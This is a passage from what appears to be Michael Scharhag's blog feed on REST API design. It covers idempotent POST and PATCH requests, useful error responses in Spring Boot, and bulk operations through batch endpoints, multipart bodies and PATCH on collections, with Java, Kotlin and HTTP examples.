        require(canAdapt(from, to))
        return objectMapper.readValue(from as String, to.java)
    }
}</pre>
<p>Now we can use our new extension method to convert a JSON string to a <span class="code">Person</span> object:</p>
<pre class="brush: java">
data class Person(val name: String, val age: Int)

fun main() {
    // register available adapter at application start
    adapters.add(JsonToObjectAdapter())

    // ...

    // actual usage
    val json = """
        {
            "name": "John",
            "age" : 42
        }
    """.trimIndent()

    val person = json.adaptTo<Person>()
}</pre>
<p>You can find the <a href="https://github.com/mscharhag/kotlin-adapters" target="_blank">source code of the examples on GitHub</a>.</p>
<p>Within <a href="https://github.com/mscharhag/kotlin-adapters/blob/master/src/main/kotlin/com.mscharhag.adapters/adapters.kt" target="_blank">adapters.kt</a> you find all the required pieces in case you want to try this on your own. In <a href="https://github.com/mscharhag/kotlin-adapters/blob/master/src/main/kotlin/com.mscharhag.adapters/example-usage.kt" target="_blank">example-usage.kt</a> you find some adapter implementations and usage examples.</p>
<h1>Making POST and PATCH requests idempotent</h1>
<p>Michael Scharhag, 2021-06-13</p>
<p>In an earlier post about <a href="https://www.mscharhag.com/api-design/http-idempotent-safe" target="_blank">idempotency and safety of HTTP methods</a> we learned that idempotency is a positive API feature. It helps make an API more fault-tolerant as a client can safely retry a request in case of connection problems.</p>
<p>The HTTP specification defines GET, HEAD, OPTIONS, TRACE, PUT and DELETE methods as idempotent. Of these methods, GET, PUT and DELETE are the ones that are usually used in REST APIs. Implementing GET, PUT and DELETE in an idempotent way is typically not a big problem.</p>
<p>POST and PATCH are a bit different: neither of them is specified as idempotent. However, both can be implemented in an idempotent way, which makes things easier for clients in case of problems. In this post we will explore different options to make POST and PATCH requests idempotent.</p>
<h2>Using a unique business constraint</h2>
<p>The simplest approach to provide idempotency when creating a new resource (usually expressed via POST) is a unique business constraint.</p>
<p>For example, consider we want to create a user resource which requires a unique email address:</p>
<pre>
POST /users
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>If this request is accidentally sent twice by the client, the second request returns an error because a user with the given email address already exists. In this case, usually HTTP 400 (bad request) or HTTP 409 (conflict) is returned as status code.</p>
<p>Note that the constraint used to provide idempotency does not have to be part of the request body. URI parts and relationships can also help to form a unique constraint.</p>
<p>A good example for this is a resource that relates to a parent resource in a one-to-one relation. For example, assume we want to pay an order with a given order-id.</p>
<p>The payment request might look like this:</p>
<pre>
POST /order/<order-id>/payment
{
... (payment details)
}</pre>
<p>An order can only be paid once so <em>/payment</em> is in a one-to-one relation to its parent resource <em>/order/<order-id></em>. If there is already a payment present for the given order, the server can reject any further payment attempts.</p>
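<p>The unique email constraint from the first example can be sketched in a few lines of Java. <span class="code">UserRegistry</span> is a hypothetical in-memory stand-in; in a real application the constraint would typically be enforced by a unique index in the database. The method returns the HTTP status code a controller could send back, using 409 for the duplicate case.</p>

```java
import java.util.Locale;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical in-memory stand-in for a user table with a unique email column
final class UserRegistry {
    private final Map<String, String> namesByEmail = new ConcurrentHashMap<>();

    // Returns the HTTP status code for the response
    int createUser(String name, String email) {
        String key = email.toLowerCase(Locale.ROOT);
        // putIfAbsent is atomic, so two concurrent duplicates cannot both succeed
        String existing = namesByEmail.putIfAbsent(key, name);
        return existing == null ? 201 : 409;
    }

    int size() {
        return namesByEmail.size();
    }
}
```

<p>If the request from above is accidentally sent twice, the first call creates the user and the second one is rejected without creating a duplicate.</p>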
<h2>Using ETags</h2>
<p><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag" target="_blank">Entity tags (ETags)</a> are a good approach to make update requests idempotent. ETags are generated by the server based on the current resource representation. The ETag is returned in the <em>ETag</em> response header. For example:</p>
<p>Request</p>
<pre>
GET /users/123</pre>
<p>Response</p>
<pre>
HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>Now assume we want to use a <a href="https://www.mscharhag.com/api-design/rest-partial-updates-patch" target="_blank">JSON Merge Patch</a> request to update the user's name:</p>
<pre>
PATCH /users/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"name": "John Smith"
}</pre>
<p>We use the <em>If-Match</em> condition to tell the server only to execute the request if the ETag matches. Updating the resource leads to an updated ETag on the server side. So, if the request is accidentally sent twice, the server rejects the second request because the ETag no longer matches. Usually HTTP 412 (precondition failed) should be returned in this case.</p>
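<p>On the server side, the check boils down to comparing the <em>If-Match</em> value with the current ETag before applying the change. Here is a minimal sketch. <span class="code">UserResource</span> is a hypothetical class that holds only the name, the ETag is assumed to be a SHA-256 hash of that name, and the status code 204 for a successful update is just one possible choice.</p>

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical resource with a single field
final class UserResource {
    private String name;

    UserResource(String name) {
        this.name = name;
    }

    // The ETag is derived from the current state, so it changes with every update
    synchronized String etag() {
        try {
            byte[] hash = MessageDigest.getInstance("SHA-256")
                    .digest(name.getBytes(StandardCharsets.UTF_8));
            StringBuilder etag = new StringBuilder("\"");
            for (byte b : hash) {
                etag.append(String.format("%02x", b));
            }
            return etag.append('"').toString();
        } catch (NoSuchAlgorithmException e) {
            // SHA-256 has to be available on every Java platform
            throw new IllegalStateException(e);
        }
    }

    // Returns the HTTP status code for the response
    synchronized int patchName(String ifMatch, String newName) {
        if (!etag().equals(ifMatch)) {
            return 412; // precondition failed: the resource changed in the meantime
        }
        name = newName;
        return 204;
    }
}
```

<p>Sending the same PATCH twice with the ETag from the initial GET succeeds the first time and is rejected the second time, because the first update already changed the ETag.</p>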
<p>I explained ETags in a bit more detail in my post about <a href="https://www.mscharhag.com/api-design/rest-concurrent-updates" target="_blank">avoiding issues with concurrent updates</a>.</p>
<p>Obviously ETags can only be used if the resource already exists. So this solution cannot be used to ensure idempotency when a resource is created. On the positive side, this is a standardized and very well understood approach.</p>
<h2>Using a separate idempotency key</h2>
<p>Yet another approach is to use a separate client-generated key to provide idempotency. With this approach, the client generates a key and adds it to the request using a custom header (e.g. <em>Idempotency-Key</em>).</p>
<p>For example, a request to create a new user might look like this:</p>
<pre>
POST /users
Idempotency-Key: 1063ef6e-267b-48fc-b874-dcf1e861a49d
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>Now the server can persist the idempotency key and reject any further requests using the same key.</p>
<p>There are two questions to think about with this approach:</p>
<ul>
<li>How to deal with requests that have not been completed successfully (e.g. by returning HTTP 4xx or 5xx status codes)? Should the idempotency key be saved by the server in these cases? If so, clients always need to use a new idempotency key if they want to retry requests.</li>
<li>What to return if the server receives a request with an already known idempotency key?</li>
</ul>
<p>Personally, I tend to save the idempotency key only if the request finished successfully. In the second case I would return HTTP 409 (conflict) to indicate that a request with the given idempotency key has already been executed.</p>
<p>However, opinions can be different here. For example, the <a href="https://www.youtube.com/watch?v=nnMqSQtSZUQ" target="_blank">Stripe API makes use of an Idempotency-Key header</a>. Stripe saves the idempotency key and the returned response in all cases. If a provided idempotency key is already present, the stored response gets returned without executing the operation again.</p>
<p>The latter can confuse the client in my opinion. On the other hand, it gives the client the option to retrieve the response of a previously executed request again.</p>
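<p>The variant I described as my personal preference (save the key only after a successful request, answer repeated keys with HTTP 409) can be sketched like this. <span class="code">IdempotencyFilter</span> is a hypothetical class. Keys are kept in memory and never expire, and the method is synchronized for simplicity, which means requests are processed one at a time. A real implementation would need persistent storage and a finer-grained way to reserve a key.</p>

```java
import java.util.HashSet;
import java.util.Set;
import java.util.function.IntSupplier;

// Hypothetical component that sits in front of the actual operation
final class IdempotencyFilter {
    private final Set<String> completedKeys = new HashSet<>();

    // The operation returns the HTTP status code it produced
    synchronized int handle(String idempotencyKey, IntSupplier operation) {
        if (completedKeys.contains(idempotencyKey)) {
            return 409; // a request with this key has already been executed
        }
        int status = operation.getAsInt();
        // Remember the key only for successful requests,
        // so failed requests can be retried with the same key
        if (status >= 200 && status < 300) {
            completedKeys.add(idempotencyKey);
        }
        return status;
    }
}
```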
<h2>Summary</h2>
<p>A simple unique business key can be used to provide idempotency for operations that create resources.</p>
<p>For non-creating operations we can use server generated ETags combined with the <em>If-Match</em> header. This approach has the advantage of being standardized and widely known.</p>
<p>As an alternative we can use a client generated idempotency key provided in a custom request header. The server saves those idempotency keys and rejects requests that contain an already used idempotency key. This approach can be used for all types of requests. However, it is not standardized and has some points to think about.</p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>
<h1>Providing useful API error messages with Spring Boot</h1>
<p>Michael Scharhag, 2021-05-30</p>
<p>For API users it is quite important that an API provides useful error messages. Otherwise, it can be hard to figure out why things do not work. Debugging what's wrong can quickly become a larger effort for the client than actually implementing useful error responses on the server side. This is especially true if clients are not able to solve the problem themselves and additional communication is required.</p>
<p>Nonetheless this topic is often ignored or implemented halfheartedly.</p>
<h2>Client and security perspectives</h2>
<p>There are different perspectives on error messages. Detailed error messages are more helpful for clients while, from a security perspective, it is preferable to expose as little information as possible. Luckily those two views often do not conflict that much, when implemented correctly.</p>
<p>Clients are usually interested in very specific error messages if the error is produced by them. This should usually be indicated by a <a href="https://www.mscharhag.com/api-design/http-status-codes" target="_blank">4xx status code</a>. Here, we need specific messages that point to the mistake made by the client without exposing any internal implementation detail.</p>
<p>On the other hand, if the client request is valid and the error is produced by the server (<a href="http://www.mscharhag.com/api-design/http-status-codes" target="_blank">5xx status codes</a>), we should be conservative with error messages. In this case, the client is not able to solve the problem and therefore does not require any details about the error.</p>
<p>A response indicating an error should contain at least two things: a human readable message and an error code. The first one helps the developer who sees the error message in the log file. The latter allows specific error processing on the client (e.g. showing a specific error message to the user).</p>
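<p>The difference between client and server errors can be sketched without any framework. The following plain Java snippet is only an illustration: <span class="code">ErrorResponses</span>, <span class="code">ApiError</span>, the <span class="code">INTERNAL_ERROR</span> code and the message texts are assumptions made for this sketch, not part of Spring.</p>

```java
// Framework-free sketch; all names and messages here are hypothetical.
final class ErrorResponses {

    // Minimal error payload: status, machine-readable code, human-readable message.
    static final class ApiError {
        final int status;
        final String code;
        final String message;

        ApiError(int status, String code, String message) {
            this.status = status;
            this.code = code;
            this.message = message;
        }
    }

    // Hypothetical client error that carries the id the client asked for.
    static final class ArticleNotFoundException extends RuntimeException {
        final String articleId;

        ArticleNotFoundException(String articleId) {
            super("No article with id " + articleId + " found");
            this.articleId = articleId;
        }
    }

    static ApiError toApiError(RuntimeException e) {
        if (e instanceof ArticleNotFoundException) {
            // Client error (4xx): specific message built from the exception data.
            String id = ((ArticleNotFoundException) e).articleId;
            return new ApiError(404, "ARTICLE_NOT_FOUND",
                    "No article with id " + id + " found");
        }
        // Server error (5xx): generic message, the exception message is not exposed.
        return new ApiError(500, "INTERNAL_ERROR", "An unexpected error occurred");
    }
}
```

<p>Unknown exceptions fall through to the generic branch, so internal details only reach the client if someone explicitly adds a mapping for them.</p>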
<h2>How to build a useful error response in a Spring Boot application?</h2>
<p>Assume we have a small application in which we can publish articles. A simple Spring controller to do this might look like this:</p>
<pre class="brush: java">
@RestController
public class ArticleController {
@Autowired
private ArticleService articleService;
@PostMapping("/articles/{id}/publish")
public void publishArticle(@PathVariable ArticleId id) {
articleService.publishArticle(id);
}
}</pre>
<p>Nothing special here, the controller just delegates the operation to a service, which looks like this:</p>
<pre class="brush: java">
@Service
public class ArticleService {
@Autowired
private ArticleRepository articleRepository;
public void publishArticle(ArticleId id) {
Article article = articleRepository.findById(id)
.orElseThrow(() -> new ArticleNotFoundException(id));
if (!article.isApproved()) {
throw new ArticleNotApprovedException(article);
}
...
}
}</pre>
<p>Inside the service we throw specific exceptions for possible client errors. Note that those exceptions do not just describe the error. They also carry information that might help us later to produce a good error message:</p>
<pre class="brush: java">
public class ArticleNotFoundException extends RuntimeException {
private final ArticleId articleId;
public ArticleNotFoundException(ArticleId articleId) {
super(String.format("No article with id %s found", articleId));
this.articleId = articleId;
}
// getter
}</pre>
<p>If the exception is specific enough we do not need a generic message parameter. Instead, we can define the message inside the exception constructor.</p>
<p>Next we can use an <span class="code">@ExceptionHandler</span> method in a <span class="code">@ControllerAdvice</span> bean to handle the actual exception:</p>
<pre class="brush: java">
@ControllerAdvice
public class ArticleExceptionHandler {
@ExceptionHandler(ArticleNotFoundException.class)
public ResponseEntity<ErrorResponse> onArticleNotFoundException(ArticleNotFoundException e) {
String message = String.format("No article with id %s found", e.getArticleId());
return ResponseEntity
.status(HttpStatus.NOT_FOUND)
.body(new ErrorResponse("ARTICLE_NOT_FOUND", message));
}
...
}</pre>
<p>If controller methods throw exceptions, Spring tries to find a method annotated with a matching <span class="code">@ExceptionHandler</span> annotation. <span class="code">@ExceptionHandler</span> methods can have flexible method signatures, similar to standard controller methods. For example, we can add an <span class="code">HttpServletRequest</span> parameter and Spring will pass in the current request object. Possible parameters and return types are described in the <a href="https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/ExceptionHandler.html" target="_blank">Javadocs of <span class="code">@ExceptionHandler</span></a>.</p>
<p>In this example, we create a simple <span class="code">ErrorResponse</span> object that consists of an error code and a message.</p>
<p>The message is constructed based on the data carried by the exception. It is also possible to pass the exception message to the client. However, in this case we need to make sure everyone in the team is aware of this and exception messages do not contain sensitive information. Otherwise, we might accidentally leak internal information to the client.</p>
<p><span class="code">ErrorResponse</span> is a simple POJO used for JSON serialization:</p>
<pre class="brush: java">
public class ErrorResponse {
private final String code;
private final String message;
public ErrorResponse(String code, String message) {
this.code = code;
this.message = message;
}
// getter
}</pre>
<h2>Testing error responses</h2>
<p>A good test suite should not miss tests for specific error responses. In our example we can verify error behaviour in different ways. One way is to use a <a href="https://docs.spring.io/spring-framework/docs/current/reference/html/testing.html#spring-mvc-test-framework" target="_blank">Spring MockMvc</a> test.</p>
<p>For example:</p>
<pre class="brush: java">
@SpringBootTest
@AutoConfigureMockMvc
public class ArticleExceptionHandlerTest {
@Autowired
private MockMvc mvc;
@MockBean
private ArticleRepository articleRepository;
@Test
public void articleNotFound() throws Exception {
when(articleRepository.findById(new ArticleId("123"))).thenReturn(Optional.empty());
mvc.perform(post("/articles/123/publish"))
.andExpect(status().isNotFound())
.andExpect(jsonPath("$.code").value("ARTICLE_NOT_FOUND"))
.andExpect(jsonPath("$.message").value("No article with id 123 found"));
}
}</pre>
<p>Here, we use a mocked <span class="code">ArticleRepository</span> that returns an empty <span class="code">Optional</span> for the passed id. We then verify that the error code and message match the expected strings.</p>
<p>In case you want to learn more about testing Spring applications with MockMvc: I recently wrote an article showing how to <a href="https://www.mscharhag.com/spring/clean-mock-mvc-tests" target="_blank">improve MockMvc tests</a>.</p>
<h2>Summary</h2>
<p>Useful error messages are an important part of an API.</p>
<p>If errors are produced by the client (HTTP 4xx status codes) servers should provide a descriptive error response containing at least an error code and a human readable error message. Responses for unexpected server errors (HTTP 5xx) should be conservative to avoid accidental exposure of any internal information.</p>
<p>To provide useful error responses we can use specific exceptions that carry related data. Within <span class="code">@ExceptionHandler</span> methods we then construct error messages based on the exception data.</p>2021-05-30T21:42:17ZSupporting bulk operations in REST APIsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-04-27:1c1fef1c-d41c-45c5-90d0-f139af0c52732022-08-09T19:51:23Z2021-05-03T19:51:23Z<p>Bulk (or batch) operations are used to perform an action on more than one resource in a single request. This can help reduce networking overhead. For network performance it is usually better to make fewer requests instead of more requests with less data.</p>
<p>However, before adding support for bulk operations you should think twice about whether this feature is really needed. Often network performance is not what limits request throughput. You should also consider techniques like <a href="https://en.wikipedia.org/wiki/HTTP_pipelining" rel="nofollow" target="_blank">HTTP pipelining</a> as an alternative to improve performance.</p>
<p>When implementing bulk operations we should differentiate between two different cases:</p>
<ul>
<li>Bulk operations that group together many arbitrary operations in one request. For example: <em>Delete product with id 42</em>, <em>create a user named John</em> and <em>retrieve all product-reviews created yesterday</em>.</li>
<li>Bulk operations that perform one operation on different resources of the same type. For example: <em>Delete the products with id 23, 45, 67 and 89</em>.</li>
</ul>
<p>In the next section we will explore different solutions that can help us with both situations. Be aware that the shown solutions might not look very REST-like. Bulk operations in general are not very compatible with REST constraints as we operate on different resources with a single request. So there simply is no real REST solution.</p>
<p>In the following examples we will always return a synchronous response. However, as bulk operations usually take longer to process it is likely you are also interested in an asynchronous processing style. In this case, my post about <a href="https://www.mscharhag.com/api-design/rest-asynchronous-operations" target="_blank">asynchronous operations with REST</a> might also be interesting to you.</p>
<h2>Expressing multiple operations within the request body</h2>
<p>One approach that quickly comes to mind is to use a standard data format like JSON to define a list of desired operations.</p>
<p>Let's start with a simple example request:</p>
<pre>
POST /batch
</pre>
<pre>
[
{
"path": "/products",
"method": "post",
"body": {
"name": "Cool Gadget",
"price": "$ 12.45 USD"
}
}, {
"path": "/users/43",
"method": "put",
"body": {
"name": "Paul"
}
},
...
]</pre>
<p>We use a generic <em>/batch</em> endpoint that accepts a simple JSON format to describe desired operations using URIs and HTTP methods. Here, we want to execute a POST request to <em>/products</em> and a PUT request to <em>/users/43</em>.</p>
<p>A response body for the shown request might look like this:</p>
<pre>
[
{
"path": "/products",
"method": "post",
"body": {
"id": 123,
"name": "Cool Gadget",
"price": "$ 12.45 USD"
},
"status": 201
}, {
"path": "/users/43",
"method": "put",
"body": {
"id": 43,
"name": "Paul"
},
"status": 200
},
...
]</pre>
<p>For each requested operation we get a result object containing the URI and HTTP method again. Additionally we get the status code and response body for each operation.</p>
<p>This does not look too bad. In fact, APIs like this can be found in practice. Facebook for example uses a similar approach to <a href="https://developers.facebook.com/docs/graph-api/making-multiple-requests" rel="nofollow" target="_blank">batch multiple Graph API requests</a>.</p>
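<p>On the server side, such a batch endpoint essentially loops over the submitted operations and collects one result per operation. A minimal sketch in plain Java could look like this. The classes <span class="code">Operation</span> and <span class="code">Result</span> and the <span class="code">handler</span> function are hypothetical stand-ins for whatever internal dispatching the application uses, and mapping unexpected exceptions to status 500 is an assumption of this sketch:</p>

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;

// Hypothetical sketch of a batch dispatcher; not tied to any framework.
final class BatchSketch {

    static final class Operation {
        final String method;
        final String path;
        final String body;

        Operation(String method, String path, String body) {
            this.method = method;
            this.path = path;
            this.body = body;
        }
    }

    static final class Result {
        final String method;
        final String path;
        final int status;
        final String body;

        Result(String method, String path, int status, String body) {
            this.method = method;
            this.path = path;
            this.status = status;
            this.body = body;
        }
    }

    // Executes every operation and reports each outcome individually.
    static List<Result> execute(List<Operation> operations,
                                Function<Operation, Result> handler) {
        List<Result> results = new ArrayList<>();
        for (Operation operation : operations) {
            try {
                results.add(handler.apply(operation));
            } catch (RuntimeException e) {
                // One failing operation does not abort the remaining ones.
                results.add(new Result(operation.method, operation.path, 500, null));
            }
        }
        return results;
    }
}
```

<p>The results are returned in request order, which lets clients match each result to the operation they submitted.</p>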
<p>However, there are some things to consider with this approach:</p>
<p>How are the desired operations executed on the server side? Maybe it is implemented as a simple method call. It is also possible to create real HTTP requests from the JSON data and then process those requests. In this case, it is important to think about request headers which might contain important information required by the processing endpoint (e.g. authentication tokens, etc.).</p>
<p>Headers in general are missing in this example. However, headers might be important. For example, it is perfectly viable for a server to respond to a POST request with HTTP 201 and an empty body (see my post about <a href="https://www.mscharhag.com/api-design/resource-creation-post" target="_blank">resource creation</a>). The URI of the newly created resource is usually transported using a <em>Location</em> header. Without access to this header the client might not know how to look up the newly created resource. So think about adding support for headers in your request format.</p>
<p>In the example we assume that all requests and responses use JSON data as body which might not always be the case (think of file uploads for example). As an alternative we can define the request body as a string, which gives us more flexibility. In this case, we need to escape JSON double quotes, which can be awkward to read.</p>
<p>An example request that includes headers and uses a string body might look like this:</p>
<pre>
[
{
"path": "/users/43",
"method": "put",
"headers": [{
"name": "Content-Type",
"value": "application/json"
}],
"body": "{ \"name\": \"Paul\" }"
},
...
]</pre>
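<p>Producing such an escaped string body is normally the job of a JSON library. To illustrate what happens to the inner document, here is a small hand-written sketch in plain Java. <span class="code">JsonStrings.quote</span> is a hypothetical helper written for this example and only covers the escapes required for JSON strings:</p>

```java
// Hypothetical helper; real projects would normally rely on a JSON library.
final class JsonStrings {

    // Wraps the raw text in double quotes and escapes characters
    // that are not allowed unescaped inside a JSON string.
    static String quote(String raw) {
        StringBuilder sb = new StringBuilder("\"");
        for (int i = 0; i < raw.length(); i++) {
            char c = raw.charAt(i);
            switch (c) {
                case '"':
                    sb.append("\\\"");
                    break;
                case '\\':
                    sb.append("\\\\");
                    break;
                case '\n':
                    sb.append("\\n");
                    break;
                case '\r':
                    sb.append("\\r");
                    break;
                case '\t':
                    sb.append("\\t");
                    break;
                default:
                    if (c < 0x20) {
                        // Remaining control characters use the \\uXXXX form.
                        sb.append(String.format("\\u%04x", (int) c));
                    } else {
                        sb.append(c);
                    }
            }
        }
        return sb.append('"').toString();
    }
}
```

<p>Passing the inner JSON document <em>{ "name": "Paul" }</em> to this helper yields the escaped string value used for <em>body</em> in the request above.</p>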
<h2>Multipart Content-Type to the rescue?</h2>
<p>In the previous section we essentially translated HTTP requests and responses to JSON so we can group them together in a single request. However, we can do the same in a more standardized way with multipart content-types.</p>
<p>A multipart <em>Content-Type</em> header indicates that the HTTP message body consists of multiple distinct body parts and each part can have its own <em>Content-Type</em>. We can use this to merge multiple HTTP requests into a single multipart request body.</p>
<p>A quick note before we look at an example: My example snippets for HTTP requests and responses are usually simplified (unnecessary headers, HTTP versions, etc. might be skipped). However, in the next snippet we pack HTTP requests into the body of a multipart request requiring correct HTTP syntax. Therefore, the next snippets use the exact HTTP message syntax.</p>
<p>Now let's look at an example multipart request containing two HTTP requests:</p>
<pre>
1 POST http://api.my-cool-service.com/batch HTTP/1.1
2 Content-Type: multipart/mixed; boundary=request_delimiter
3 Content-Length: <total body length in bytes>
4
5 --request_delimiter
6 Content-Type: application/http
7 Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
8
9 POST http://api.my-cool-service.com/products HTTP/1.1
10 Content-Type: application/json
11
12 {
13 "name": "Cool Gadget",
14 "price": "$ 12.45 USD"
15 }
16 --request_delimiter
17 Content-Type: application/http
18 Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
19
20 PUT http://api.my-cool-service.com/users/43 HTTP/1.1
21 Content-Type: application/json
22
23 {
24 "name": "Paul"
25 }
26 --request_delimiter--</pre>
<p>Multipart content types require a <em>boundary </em>parameter. This parameter specifies the so-called <em>encapsulation boundary</em> which acts like a delimiter between different body parts.</p>
<p>Quoting the <a href="https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html" target="_blank">RFC</a>:</p>
<blockquote>
<p>The encapsulation boundary is defined as a line consisting entirely of two hyphen characters ("-", decimal code 45) followed by the boundary parameter value from the Content-Type header field.</p>
</blockquote>
<p>In line 2 we set the <em>Content-Type</em> to <em>multipart/mixed</em> with a <em>boundary </em>parameter of <em>request_delimiter</em>. The blank line after the <em>Content-Length</em> header separates HTTP headers from the body. The following lines define the multipart request body.</p>
<p>We start with the <em>encapsulation boundary</em> indicating the beginning of the first body part. Next follow the body part headers. Here, we set the <em>Content-Type</em> header of the body part to <em>application/http</em> which indicates that this body part contains an HTTP message. We also set a <em>Content-ID</em> header which can be used to identify a specific body part. We use a client generated UUID for this.</p>
<p>The next blank line (line 8) indicates that now the actual body part begins (in our case that's the embedded HTTP request). The first body part ends with the <em>encapsulation boundary</em> at line 16.</p>
<p>The next body part follows the encapsulation boundary and uses the same format as the first one.</p>
<p>Note that the <em>encapsulation boundary</em> following the last body part contains two additional hyphens at the end which indicates that no further body parts will follow.</p>
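<p>The structure described above can be assembled with a few lines of plain Java. This is only a sketch: <span class="code">MultipartBatch</span> and <span class="code">Part</span> are hypothetical names, the embedded HTTP messages are passed in as ready-made strings, and CRLF line endings are assumed throughout.</p>

```java
import java.util.List;

// Hypothetical sketch that assembles a multipart/mixed body from raw HTTP messages.
final class MultipartBatch {

    private static final String CRLF = "\r\n";

    static final class Part {
        final String contentId;
        final String httpMessage; // complete embedded HTTP message as text

        Part(String contentId, String httpMessage) {
            this.contentId = contentId;
            this.httpMessage = httpMessage;
        }
    }

    static String buildBody(String boundary, List<Part> parts) {
        StringBuilder body = new StringBuilder();
        for (Part part : parts) {
            body.append("--").append(boundary).append(CRLF)    // encapsulation boundary
                .append("Content-Type: application/http").append(CRLF)
                .append("Content-ID: ").append(part.contentId).append(CRLF)
                .append(CRLF)                                  // blank line ends the part headers
                .append(part.httpMessage).append(CRLF);
        }
        // The closing boundary carries two additional hyphens at the end.
        body.append("--").append(boundary).append("--").append(CRLF);
        return body.toString();
    }
}
```

<p>The boundary passed to <span class="code">buildBody</span> must match the <em>boundary</em> parameter of the outer <em>Content-Type</em> header and must not occur inside any of the embedded messages.</p>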
<p>A response to this request might follow the same principle and look like this:</p>
<pre>
HTTP/1.1 200 OK
Content-Type: multipart/mixed; boundary=response_delimiter
Content-Length: <total body length in bytes>

--response_delimiter
Content-Type: application/http
Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7

HTTP/1.1 201 Created
Content-Type: application/json
Location: http://api.my-cool-service.com/products/123

{
"id": 123,
"name": "Cool Gadget",
"price": "$ 12.45 USD"
}
--response_delimiter
Content-Type: application/http
Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99

HTTP/1.1 200 OK
Content-Type: application/json

{
"id": 43,
"name": "Paul"
}
--response_delimiter--</pre>
<p>This multipart response body contains two body parts, both containing HTTP responses. Note that the first body part also contains a <em>Location</em> header which should be included when sending an HTTP 201 (Created) response status.</p>
<p>Multipart messages seem like a nice way to merge multiple HTTP messages into a single message as they use a standardized and generally understood technique.</p>
<p>However, there is one big caveat here. Clients and the server need to be able to construct and process the actual HTTP messages in raw text format. Usually this functionality is hidden behind HTTP client libraries and server side frameworks and might not be easily accessible.</p>
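<p>To give an impression of the raw text processing involved, the following sketch splits a multipart body into its parts. It is deliberately simplified and rests on several assumptions: <span class="code">MultipartSplitter</span> is a hypothetical class, lines end with CRLF, and the part headers and the embedded HTTP messages are left unparsed.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Simplified, hypothetical splitter; a real parser has to handle more edge cases.
final class MultipartSplitter {

    // Returns the raw text of each body part (part headers plus content).
    static List<String> split(String body, String boundary) {
        String delimiter = "--" + boundary;
        String closingDelimiter = delimiter + "--";
        List<String> parts = new ArrayList<>();
        List<String> current = null; // lines of the part currently being read

        for (String line : body.split("\r\n", -1)) {
            boolean closing = line.equals(closingDelimiter);
            if (closing || line.equals(delimiter)) {
                if (current != null) {
                    parts.add(String.join("\r\n", current));
                }
                if (closing) {
                    return parts; // no further body parts follow
                }
                current = new ArrayList<>();
            } else if (current != null) {
                current.add(line);
            }
        }
        return parts;
    }
}
```

<p>Each returned part still contains its own headers followed by an embedded HTTP message, which has to be parsed in a second step.</p>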
<h2>Bulk operations on REST resources</h2>
<p>In the previous examples we used a generic <em>/batch</em> endpoint that can be used to modify many different types of resources in a single request. Now we will apply bulk operations to a specific set of resources, which moves us a bit closer to a <em>REST-like</em> style.</p>
<p>Sometimes only a single operation needs to support bulk data. In such a case, we can simply create a new resource that accepts a collection of bulk entries.</p>
<p>For example, assume we want to import a couple of products with a single request:</p>
<pre>
POST /product-import
</pre>
<pre>
[
{
"name": "Cool Gadget",
"price": "$ 12.45 USD"
},
{
"name": "Very cool Gadget",
"price": "$ 19.99 USD"
},
...
]</pre>
<p>A simple response body might look like this:</p>
<pre>
[
{
"status": "imported",
"id": 234235
},
{
"status": "failed",
"error": "Product name too long, max 15 characters allowed"
},
...
]</pre>
<p>Again we return a collection containing details about every entry. As we provide a response to a specific operation (<em>importing products</em>) there is no need to use a generic response format. Instead, we can use a specific format that communicates the import status and potential import errors.</p>
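<p>A server-side import loop that produces such a per-entry result could be sketched as follows. <span class="code">ProductImport</span> and <span class="code">ImportResult</span> are hypothetical names, products are reduced to their names, and the counter used for ids is only a placeholder for real persistence.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical sketch: one result entry per imported product.
final class ProductImport {

    static final int MAX_NAME_LENGTH = 15; // limit taken from the example error message

    static final class ImportResult {
        final String status;
        final Long id;      // only set for imported products
        final String error; // only set for failed products

        ImportResult(String status, Long id, String error) {
            this.status = status;
            this.id = id;
            this.error = error;
        }
    }

    static List<ImportResult> importProducts(List<String> productNames) {
        List<ImportResult> results = new ArrayList<>();
        long nextId = 1; // placeholder id generator
        for (String name : productNames) {
            if (name.length() > MAX_NAME_LENGTH) {
                // A failing entry is reported but does not stop the import.
                results.add(new ImportResult("failed", null,
                        "Product name too long, max 15 characters allowed"));
            } else {
                results.add(new ImportResult("imported", nextId++, null));
            }
        }
        return results;
    }
}
```

<p>With the two product names from the request above, the first entry is imported while <em>Very cool Gadget</em> (16 characters) is rejected.</p>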
<h2>Partially updating collections</h2>
<p>In a <a href="https://www.mscharhag.com/api-design/rest-partial-updates-patch" target="_blank">previous post</a> we learned that PATCH can be used for partial modification of resources. PATCH can also use a separate format to describe the desired changes.</p>
<p>Both sound useful for implementing bulk operations. By using PATCH on a resource collection (e.g. <em>/products</em>) we can <em>partially modify the collection</em>. We can use this to add new elements to the collection or update existing elements.</p>
<p>For example we can use the following snippet to modify the <em>/products</em> collection:</p>
<pre>
PATCH /products
</pre>
<pre>
[
{
"action": "replace",
"path": "/123",
"value": {
"name": "Yellow cap",
"description": "It's a cap and it's yellow"
}
},
{
"action": "delete",
"path": "/124"
},
{
"action": "create",
"value": {
"name": "Cool new product",
"description": "It is very cool!"
}
}
]</pre>
<p>Here we perform three operations on the <em>/products</em> collection in a single request. We update resource <em>/products/123</em> with new information, delete resource <em>/products/124</em> and create a completely new product.</p>
<p>A response might look something like this:</p>
<pre>
[
